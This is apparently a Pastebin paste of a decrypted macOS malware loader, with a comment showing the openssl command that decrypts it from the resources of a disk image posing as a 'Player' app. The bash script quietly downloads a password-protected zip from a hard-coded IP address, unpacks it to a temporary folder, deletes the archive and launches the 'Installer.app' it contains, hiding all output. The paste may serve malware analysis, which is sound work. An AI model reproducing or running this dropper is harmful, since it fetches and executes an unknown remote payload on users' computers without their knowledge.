Advertisement
opexxx

53ff1f062d4ac7ac8271ceea4bf5b911f992e55b23531bdd87943dbc3594

Sep 28th, 2018
361
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.49 KB | None | 0 0
  1. # openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:6341145384 </Volumes/Player/Player.app/Contents/Resources/enc
  2. #!/bin/bash
  3. tmp_path="$(mktemp /tmp/XXXXXXXXX)"
  4. url="http://34.225.46.51/static/sources/kittens.zip"
  5. file_name="Installer.app"
  6. curl -f0L "$url" >/dev/null 2>&1 >>$tmp_path
  7. app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
  8. unzip -P "$unzip_password" "$tmp_path" -d "$app_dir" > /dev/null 2>&1
  9. rm -f $tmp_path
  10. open -a "$app_dir$file_name" --args "s" "$session_guid" "$volume_name"%
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement